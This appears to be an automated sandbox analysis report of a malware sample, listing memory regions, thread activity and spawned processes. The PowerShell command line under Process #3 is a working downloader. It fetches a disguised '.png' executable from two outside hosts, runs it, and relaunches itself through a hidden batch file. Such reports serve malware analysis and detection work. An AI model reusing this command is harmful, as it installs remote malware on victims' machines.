private_0x0000000000230000	0x00230000	0x0032ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000370000	0x00370000	0x0046ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000470000	0x00470000	0x005f7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000620000	0x00620000	0x0062ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000630000	0x00630000	0x007b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007c0000	0x007c0000	0x01bbffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001bc0000	0x01bc0000	0x01f02fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01f10000	0x021defff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e70000	0x49ec8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
winbrand.dll	0x7fef5a50000	0x7fef5a57fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0x9e4

(Host: 52, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-09-25 20:32:39 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 70231	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e70000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77336d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aDU0VK IWA5kLS\Desktop	1	Fn
Environment	Get Environment String		1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77320000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x773323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77328290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x773317e0	1	Fn
Environment	Get Environment String	name = TMP, result_out = C:\Users\ADU0VK~1\AppData\Local\Temp	4	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x9f8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #3: powershell.exe

(Host: 652, Network: 0)

Information	Value
ID	#3
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'');Start-Process ''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" \| Out-File -encoding ASCII -FilePath C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat;Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat' -WindowStyle Hidden"
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\Desktop\
Monitor	Start Time: 00:00:37, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:01:49

OS Process Information

Information	Value
PID	0x9f8
Parent PID	0x9e0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9FC 0x A00 0x A04 0x A08 0x A0C 0x A10 0x A1C 0x A20 0x A3C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable, Writable	Region Actions
powershell.exe.mui	0x00070000	0x00072fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0010ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00110000	0x00176fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00190fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001c0000	0x001c0000	0x001c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001d0000	0x001d0000	0x001dffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable	Region Actions
cversions.2.db	0x001f0000	0x001f3fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db	0x00200000	0x00226fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000240000	0x00240000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000340000	0x00340000	0x0043ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000440000	0x00440000	0x005c7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000005d0000	0x005d0000	0x00750fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000760000	0x00760000	0x01b5ffff	Pagefile Backed Memory	Readable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db	0x01b60000	0x01b8ffff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x01b90000	0x01b93fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001ba0000	0x01ba0000	0x01ba0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001bb0000	0x01bb0000	0x01bb2fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001bc0000	0x01bc0000	0x01bc0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001bd0000	0x01bd0000	0x01bdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001be0000	0x01be0000	0x01bfffff	Private Memory		Region Actions Download Dump
private_0x0000000001c00000	0x01c00000	0x01c0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001c10000	0x01c10000	0x01d0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001d10000	0x01d10000	0x01deefff	Pagefile Backed Memory	Readable	Region Actions
l_intl.nls	0x01df0000	0x01df2fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001e00000	0x01e00000	0x01e00fff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x01e10000	0x01e14fff	Memory Mapped File	Readable	Region Actions
microsoft.wsman.runtime.dll	0x01e20000	0x01e27fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001e30000	0x01e30000	0x01e30fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001e40000	0x01e40000	0x01ebffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001ec0000	0x01ec0000	0x01ec0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001ec0000	0x01ec0000	0x01ed0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001ee0000	0x01ee0000	0x01f5ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01f60000	0x01fc5fff	Memory Mapped File	Readable	Region Actions
sortkey.nlp	0x01fd0000	0x02010fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002030000	0x02030000	0x020affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002100000	0x02100000	0x0217ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x02180000	0x0244efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002450000	0x02450000	0x02842fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002890000	0x02890000	0x0290ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002910000	0x02910000	0x02a0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002a50000	0x02a50000	0x02acffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000002b10000	0x02b10000	0x02b8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002b90000	0x02b90000	0x02c90fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002cc0000	0x02cc0000	0x02ccffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002cd0000	0x02cd0000	0x1accffff	Private Memory	Readable, Writable	Region Actions
private_0x000000001acd0000	0x1acd0000	0x1b39ffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll.mui	0x1b3a0000	0x1b45ffff	Memory Mapped File	Readable, Writable	Region Actions
mscorrc.dll	0x1b460000	0x1b4b3fff	Memory Mapped File	Readable	Region Actions
private_0x000000001b4c0000	0x1b4c0000	0x1b53ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x1b540000	0x1b821fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000001b830000	0x1b830000	0x1b92ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x75180000	0x75248fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77710000	0x77716fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
powershell.exe	0x13ff50000	0x13ffc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x7fee3bc0000	0x7fee3d54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x7fee3d60000	0x7fee3ecbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x7fee3ed0000	0x7fee4574fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x7fee4580000	0x7fee45bdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x7fee45c0000	0x7fee46d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x7fee46e0000	0x7fee48f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x7fee4900000	0x7fee49e4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x7fee49f0000	0x7fee4a99fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x7fee4aa0000	0x7fee4ad1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x7fee4ae0000	0x7fee4b48fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x7fee4b50000	0x7fee4e7dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x7fee4e80000	0x7fee59dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x7fee59e0000	0x7fee6402fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x7fee6930000	0x7fee780bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x7fee7810000	0x7fee81acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x7fee93f0000	0x7fee94a1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fef3d20000	0x7fef3db8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef42a0000	0x7fef430efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x7fef5a60000	0x7fef5a66fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x7fef72a0000	0x7fef72abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x7fef72b0000	0x7fef72e3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x7fef8ac0000	0x7fef8b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x7fef8b40000	0x7fef8b4efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7fef9f00000	0x7fef9f56fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb2a0000	0x7fefb2f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x7fefb8c0000	0x7fefb8cafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x7fefb8f0000	0x7fefb908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefbde0000	0x7fefbe0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefbe40000	0x7fefbf6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefbfc0000	0x7fefc1b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc650000	0x7fefc65bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7fefc840000	0x7fefc85dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefca60000	0x7fefcaa6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefceb0000	0x7fefcec6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefd280000	0x7fefd2a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd380000	0x7fefd38efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7fefd490000	0x7fefd49efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x7fefd620000	0x7fefd655fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x7fefd660000	0x7fefd679fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefd990000	0x7fefda28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefdfb0000	0x7fefed37fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefede0000	0x7fefefe2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x7fefeff0000	0x7feff041fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x7feff0d0000	0x7feff2a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7feff2b0000	0x7feff320fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff5d0000	0x7feff6a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007ff00020000	0x7ff00020000	0x7ff0002ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00030000	0x7ff00030000	0x7ff0003ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00040000	0x7ff00040000	0x7ff000dffff	Private Memory		Region Actions Download Dump
private_0x000007ff000e0000	0x7ff000e0000	0x7ff000effff	Private Memory		Region Actions Download Dump
private_0x000007ff000f0000	0x7ff000f0000	0x7ff0015ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00160000	0x7ff00160000	0x7ff0016ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00170000	0x7ff00170000	0x7ff0017ffff	Private Memory		Region Actions Download Dump
private_0x000007fffff10000	0x7fffff10000	0x7fffff1ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000007fffff20000	0x7fffff20000	0x7fffffaffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd9000	0x7fffffd9000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdb000	0x7fffffdb000	0x7fffffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 42 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat	0.32 KB (332 bytes)	MD5: 6b02cf51939341cf79053976790bdae0 SHA1: 7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed SHA256: 845ed9e3626f3b603301c7ab1987d763c13a9d8ee4444e69f181e52ebb881252		File Actions Show Properties Download

Threads

Thread 0x9fc

(Host: 344, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
